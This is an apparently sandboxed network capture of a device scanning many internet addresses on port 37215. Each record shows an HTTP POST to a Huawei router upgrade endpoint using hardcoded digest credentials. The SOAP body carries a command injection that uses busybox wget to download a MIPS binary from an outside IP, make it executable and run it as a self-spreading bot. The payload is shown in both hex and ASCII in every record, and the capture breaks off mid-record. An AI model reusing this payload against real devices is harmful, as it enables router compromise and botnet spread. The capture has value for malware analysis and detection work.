                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1643192.168.2.134494241.142.180.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507287025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1644192.168.2.1358868197.38.165.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507421017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1645192.168.2.134221232.175.108.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507458925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1646192.168.2.135633241.41.152.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507487059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1647192.168.2.134210637.234.247.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507560015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1648192.168.2.1359306157.205.141.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507601976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1649192.168.2.135464245.83.6.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507616043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1650192.168.2.1341568159.129.187.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.507647038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1651192.168.2.1354574157.198.127.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.513382912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1652192.168.2.1352066102.6.77.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.513408899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 